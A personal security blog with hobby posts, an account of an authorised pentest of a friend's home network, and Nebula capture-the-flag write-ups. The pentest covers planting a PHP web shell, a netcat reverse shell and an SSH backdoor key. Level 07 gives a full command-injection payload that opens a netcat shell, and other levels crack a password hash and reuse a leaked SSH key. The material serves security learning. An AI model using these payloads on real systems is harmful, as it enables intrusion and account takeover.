Am I officially a white hat hacker now!?

A while ago, while developing a geocaching app for pebble smartwatches called “Watch Caching”, I noticed a bug that could have security implications, so I reported it to Pebble using the whitehat guidelines set out by theme

It took them a while, but they eventually got back to me and agreed that it was a security vulnerability and wanted to offer me a significant financial reward, as well as put me in the Pebble White Hat Hall of Fame

This also took a while to come to fruition, but they did hold true to their word and sent me the money, followed a few days later by my name being added to the Pebble White Hat Hall of Fame!

Developing and debugging my own apps on JailBroken iOS8.1 using XCode 6.1 without paying apple

A while back I used an app called JailCoder to enable me to run and debug my own apps on my jailbroken iPhone 5S without having to pay Apple for a full developer account. I’m still learning iOS development and I have nothing I want to submit to the app store, so I’m reluctant to pay the £100 that Apple wants to enable me to run my own code on my own device.

Given that XCode is free, and that £100 per year would gives me the ability to sell apps through the app store, I think it’s a bargain if you are actually planning to distribute apps, but for me just learning it seems a bit steep.

There don’t seem to be many tutorials out there telling you how to do this for iOS8.1 and XCode 6.1 (they are all a bit outdated), but this is what worked for me:

  1. On your Jailbroken device install AppSync Unified 5.2-1 (or later) from AngelXWind’s repo. Don’t use any other AppSync, and if you have others, be sure to remove them.
  2. Open /Applications/Xcode.app/Contents/Developer/Platforms/iPhoneOS.platform/Developer/SDKs/iPhoneOS.sdk/SDKSettings.plist and change AD_HOC_CODE_SIGNING_ALLOWED to YES. You may need to duplicate it to the desktop, change it, save it, then drag and drop back into the original folder because OS X let you edit the file in place.
  3. If XCode was running, restart XCode.
  4. Change your Project and Target settings to “Ad Hoc Code Sign” in Build Settings
  5. Tell XCode to run app on iPhone. At this point XCode will put app on your iDevice, but can’t debug because it can’t attach to the process. The app will start then close immediately. You can now manually start the app on the phone now though.
  6. To enable debugging: In your project select File>New File Property List and create a file called “Entitlements.plist”. Add “Can be debugged” or “get-task-allow” (both do the same thing) and set the value to YES.
  7. Now change your Project and Target Code Signing Entitlements (In Build Settings) to “Entitlements.plist” (you have to type it in).

Now XCode can run and debug the app. Good luck

Note that some poeple have issues because they have other appsyncs installed. Remove all other appsyncs and install AppSync Unified from http://cydia.angelxwind.net/ (you’ll have to add this repo to cydia)

Thanks to Karen and Linus for developing AppSync Unified.

This subreddit may be helpful

I have a Raspberry PI on the way

I ordered a Raspberry PI yesterday.

I used to have a server running at home which served files, recorded tv, provided VPN, but I moved into a small flat, and there’s not much room for a server, not that my fiancée would be happy with anyway!

The PI will give me a little server back again for the duration that I’m in this flat. I’m also looking at playing with xbmc and perhaps some pvr capabilities on it. Should be fun!

My first pentest on a friend’s network

Someone I have know for a while was aware of my growing interest in information security and I had warned them a while ago that their network was probably vulnerable to attack because I had seen some web services that were not password protected running out of their home public IP address.

I saw them over the Christmas/new year period and they gave me permission to try and penetrate their network, specifically they challenged me to change the root password on their unRAID server.

I started off by firing up my Backtrack 5r3 VM and updating everything before registering Nessus and performing a scan of his public IP address.

Nessus didn’t find anything that was listed as critical, but it did show me that we had ssh running on port 22 and it also showed me all other ports that were open and had web servers running on them. I checked them all out and I found on various ports; the default Lion server webpage, SABNZBd, SickBeard, Transmission, and the unRAID server.

The website served by the unRAID server was asking for a username and password using basic access authentication. That was no use so I started looking into the other services. Not only were the operating interfaces unsecured, but their configuration sections were also open to anyone. I saw that SABNZBd was running as “admin” and that it had an option of running scripts when a download had completed. The method was to point SABNZBd to a folder containing scripts, start a download and then choose what script to run on completion. I knew I could download a file using SABNZBd or Transmission to any directory that the admin user had write permissions to, but I didn’t know at this stage how to make it executable.

I saw in SABNZBd’s preferences that I could specify the permissions (in octal format) of files and folders that were downloaded, so I ran SABNZBd on my machine, created a binary post on a newsgroup containing a script that was basically a reverse shell and tested a download to my machine with SABNZBd set to mark everything at 777. It created a folder with 777 permissions, but the file was only 555. Presumably this was for security reasons – damn!

At this point I was wishing that his machine was running Windows not OSX because SABNZBd on Windows only requires that a scripts file extension is in the PATHEXT environment variable. That would have been much easier than getting a file marked as executable.

I had to find another way of making an executable script on that machine. How could I get that machine to run my commands without having an executable script set… The web server or course. I created my single line PHP shell again (mentioned in a previous post) and set Transmission to download files to the Lion web server default folder, created a torrent containing my php script and downloaded the torrent to the server using transmission. I tested it, with the command whoami, and it worked. I was in, but I was only the user _www.

What could I do as _www? Not much, but I was able to create a reverse shell using netcat and take a look around the system. I couldn’t access admin’s files yet, but of course I could write to /tmp. If I could write to /tmp, I could create a script and mark it as executable by everyone. Then I could get SABNZBd to run it! I started thinking about making a script that would create a reverse shell, then it dawned on me: create a public/private key pair and add it to /Users/admin/.ssh/authorized_keys.

I uploaded my public key using my php shell script, and then created an executable script in /tmp that appended my key to authorized_keys.

I started a new SABNZBd download (I decided to just download something that was small, free and released under the CC license) so as no to upset anyone. Obviously I now set my script to run. All went well and I could now ssh into the machine as the admin user without a password.

At this point I cleaned up everything I had downloaded and just left my key in place so I could log in. I took a look around, but I couldn’t see anything to do with the unRAID server, so I thought I should report how far I had got.

They were surprised, and while I didn’t get into the unRAID server, I had gotten a lot further than they thought anyone would be able to. As a result of this, they have since enabled logins on all their web services and removed my public key, but they still do have some vulnerabilities, like ssh running on a default port and allowing password authentication (ripe for brute forcing). They are a lot safer than they were, but it may well be worth me going back and having another go at some point in the future.

A lot of the methods that I have used in this test were inspired by the challenges I have been working through in hackthissite.org and exploit-excercises.com and I’m very grateful to them for making the challenges.

I’m tempted to try and create a VM with this vulnerable setup and release it. I would have to check the licences, but I think most of it could be done using open source solutions (linux, apache, sabnzbd, transmission)

Match.com just sent me an email containing my password in plain text!

A few weeks ago, when I was going through all my online accounts and making the passwords more secure and unique I logged in to Match.com and deactivated my account. I didn’t delete it, just made it dormant. I did this because I found my Fiancée over 3 years ago (via Match.com) so there was no reason to still have an active account. I didn’t want to delete the account because it had some of our earliest messages to each other saved.

Anyway, I checked my emails today and noticed that I had one from them encouraging me to re-activate my account. What was more concerning was that the email contained my password in plain text! Here is a screenshot of the email:

Screen Shot 2012-12-31 at 10.13.27

I was about to submit them to plaintextoffenders.com but I did a search before and found that they were already added to the list 15 months ago, so I left a comment on the plaintextoffenders listing and decided to send a message to Match.com. The message was:

On the 20th of December 2012 I received an email encouraging me to reactivate my account. What concerns me is that in the body of the email was my password, in plain text! Firstly you should not be storing my password in plain text, and secondly (if you insist on storing passwords as plain text) you should not be sending it to me over something as insecure as email, especially if I didn’t request it!

I was about to submit match.com to http://plaintextoffenders.com, but when I searched, I saw that it was already submitted some 15 months ago. See http://plaintextoffenders.com/post/9744438766/match-com-dating-site-very-soon-after-i-got-this.

For a brief overview of why storing passwords in plain text is bad, you can start reading here: http://plaintextoffenders.com/about/

Please bear in mind that while you are now being shamed by plaintextoffenders.com, if you decide to fix the security flaw, your site would be moved to a different section of the site where you would be praised for admitting the fault and fixing it. See http://plaintextoffenders.com/reformed

I am in no way affiliated with plaintextoffenders.com, but I do support what they are trying to do and I would like to know if you are in the process of fixing, or plan to fix this security flaw in the near future?

Please reply to <email address removed>

I will update this post if/when I get a reply, but in the meantime I would recommend against joining Match.com and deleting any accounts you might have with them until they act a bit more responsibly.

Update: I got this email back from Match.com:

Thank you for contacting us at match.com.

We understand that you received an email from us on the 20th December 2012 with your password in plain text which you feel is a serious compromise of security.

We are really sorry about this error and I have forwarded your issue to our site developers to look into.

We hope you have found this information useful and please feel free to get in touch if there is anything further we can help you with. For answers to the most common questions click ‘Help’, available from the foot of any page.

At least they are not dismissing it. I wonder if anything will actually change?

I passed my course :-)

I was doing a free online networking course from Stanford University called “An Introduction to Computer Networks” recently, and they just told me that I passed.

Apparently I needed 50%, and I got 84%. I needn’t have tried so hard!

I think the course title was misleading; I was expecting to learn a bit more detail about stuff that I had already taught myself about simple LANs; network masks, routing, etc. but it was much more than just this this. It was actually more to do with how the internet works and included some quite complicated concepts and mathematical/statistical theories. I found it pretty hard work, to the point that I considered jacking it in a couple of times, because it was taking a lot of my evening and weekend time, but I’m glad I made it through. I’m just thankful that it was quite short (about 6 weeks) because now the pressure is off and I have some free time again.

The free course is by Stanford University professors Nick McKeown and Philip Levis and many subjects in detail including:

  • Protocols:
    • IP
    • TCP
    • UDP
    • ICMP
    • ARP
    • DHCP
    • DNS
    • NAT
    • BGP
    • Ethernet
  • Other Theory:
    • Encapsulation
    • Packet Switching
    • Delays (End to End & Queueing)
    • Broadcasting
    • Routing
    • Wireless

The course goes into so much detail in these subjects, and in many more. They are planning on re-running the course in Autumn 2013, so if any of this sounds interesting to you, then you should definitely consider enrolling nearer the time.

So now I’m just waiting to receive my statement on completion… I think it’s due in the new year.

Lastly I should say thanks to Nick and Philip for putting the course together and for offering it for free – Cheers guys

Exploit Exercises – Nebula – Level 08

I must admit I needed a bit of help with his one, I had most of it but not quite all. It started with the following information:

World readable files strike again. Check what that user was up to, and use it to log into flag08 account.
To do this level, log in as the level08 account with the password level08 . Files for this level can be found in /home/flag08.

So in ~flag08 there is one file of interest; capture.pcap. This is some captured network traffic. I copied this file onto my Macbook and opened it up in wireshark and spent some time looking through it. I found some interesting information like frame 43 contained a password prompt (the text “Password:”) from the server, followed by an ack from the client, then all subsequent packet exchanges contained 1 byte of TCP payload data from the client followed by an empty TCP ack packet from the server. Going through the packets, I could see that the user had sent: “backdoor…00Rm8.ate.” and then the server had replied “Login incorrect”. If we right click on a packet in the stream and select Follow TCP stream, we can see this a bit clearer.

But “backdoor…00Rm8.ate.” is not the password for flag08’s account, we need more investigation. While in the Follow TCP stream view, I selected hex dump view, and I can see that all the dots are not the same byte. Presumably they are all ascii, so I checked the ascii codes; 7f=backspace, 0d=Carriage-return.

So the password was “backd00Rmate”, this just so happens to be the password for flag08’s account.

Exploit Exercises – Nebula – Level 07

This one starts with the following information:

The flag07 user was writing their very first perl program that allowed them to ping hosts to see if they were reachable from the web server.

and Source code:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
#!/usr/bin/perl
 
use CGI qw{param};
 
print "Content-type: text/html\n\n";
 
sub ping {
    $host = $_[0];
 
    print("<html><head><title>Ping results</title></head><body><pre>");
 
    @output = `ping -c 3 $host 2>&1`;
    foreach $line (@output) { print "$line"; } 
 
    print("</pre></body></html>");
 
}
 
# check if Host set. if not, display normal page, etc
 
ping(param("Host"));

We can see that the flag07 user has an thttpd.conf file in his directory, indicating that he has a http daemon or (web server) running. This is further compounded by the fact that he has a perl script (index.cgi) in his home directory.

In the thttpd.conf file it tells us that the web server is running on port 7007. I didn’t want to exit the VM, which meant that I didn’t have a web browser, but I do have wget which allows me to make http requests from the command line so I ran:

wget -O- http://localhost:7007/index.cgi

and got some output telling me how to use ping (because it hadn’t been given sufficient arguments. From the perl code, I could see that it wants a variable submitted as “Host”. It looks like it will use this as the machine name to ping. This time I tried:

wget -O- http://localhost:7007/index.cgi?Host=localhost

and got back ping results, but I need to get this script to do something other than ping… I can see that the ping command is just a string with the submitted host name “injected” into it. There is no input sanitisation going on, so it is ripe for some code injection.

I could get the script to copy my elevated-shell-launcher program and thenset the setuid bit like I did in level 03, but this challenge reminded me of something I learned while playing with DVWA (using netcat to send shell over the network) so I tried that method instead. The url I need to load would submit the following as the Host variable:

;mkfifo /tmp/pipe;cat /tmp/pipe|bash|nc -l 4444 2&gt;&amp;1&gt;/tmp/pipe;rm /tmp/fifo;

When injected to the command that is run in the perl script, to actual command that is executed will be:

ping -c 3 ;mkfifo /tmp/pipe;cat /tmp/pipe|bash|nc -l 4444 2&gt;&amp;1&gt;/tmp/pipe;rm /tmp/fifo; 2&gt;&amp;1

This is quite a command, so I’ll break it down:

  • ping -c 3 ; – This command will fail because there is no host given, but we don’t care about that
  • mkfifo /tmp/pipe; – Make a special “pipe” file in /tmp/pipe, I’ll explain why later…
  • cat /tmp/pipe|bash|nc -l 4444 2>&1>/tmp/pipe; – this reads data from the /tmp/pipe and sends it to /bin/bash, which sends it’s output to nc, which is listening on port 4444, which then sends it’s output (stdout and stderr) back to /tmp/pipe.
  • rm /tmp/fifo; – clear up the pipe file after nc has closed.
  • 2>&1 – Redirects stderr to stdout. This is just left over from the perl script’s command, we don’t care about it really.

This should set up a netcat process listening on TCP port 4444 that will accept data (in our case this will be bash commands) from the network and send it to /tmp/pipe. cat will read data from /tmp/pipe and send it to bash, which will send it’s output to netcat, which will in turn send that back over the network. A kind of remote shell. Passing input/output of netcat and bash in this circular fashion is only possible by way of a fifo pipe and the cat command.

Obviously I’ll have to URL encode my host variable, so my whole command becomes:

wget -O- http://localhost:7007/index.cgi?Host=%3Bmkfifo%20%2Ftmp%2Fpipe%3Bcat%20%2Ftmp%2Fpipe%7Cbash%7Cnc%20-l%204444%202%3E%261%3E%2Ftmp%2Fpipe%3Brm%20%2Ftmp%2Ffifo%3B

Now I just connect from another tty session or another machine on the network (though you’ll have to edit the command if you do that) using:

nc localhost 4444

Now I can run any command including whoami and getflag

Exploit Exercises – Nebula – Level 06

Even less information about this one:

The flag06 account credentials came from a legacy unix system.
To do this level, log in as the level06 account with the password level06 . Files for this level can be found in /home/flag06.

I had a good idea what I’m looking for here, an easy to crack password hash in /etc/passwd rather than in the shadow file, so:

cat /etc/passwd | grep flag06

shows me the hash is ueqwOCnSGdsuM. I need to “crack” the hash. Time to get john the ripper on the case. At this point I didn’t have any other linux machines to hand, so I went to another tty session on this one and logged in a nebula and installed john (sudo apt-get install john). Then I ran john on the password file (john /etc/passwd) and he showed me the password. I switched over to flag06 account and the password worked as expected.

Exploit Exercises – Nebula – Level 05

Not much information to start on this one:

Check the flag05 home directory. You are looking for weak directory permissions
To do this level, log in as the level05 account with the password level05 . Files for this level can be found in /home/flag05.

The command ll (an alias for ls-alF) showed me that I had read access to ~flag05/.backup, and in there was a backup gzipped tar. Hopefully some goodies in here…

I unpacked the tar and found that it contained a folder called .ssh. This is used for secure shell authentication. That folder contained a private/public key pair and an authorized_keys file. The authorised_keys file is exactly the same as the public key file, so (assuming that the authorised_keys file had not been deleted since the backup) I should be able to ssh in using the private key, as long as it was not encrypted with a passphrase.

I copied the id_rsa file to ~/.ssh and tried to connect using:

ssh flag05@localhost

Bingo!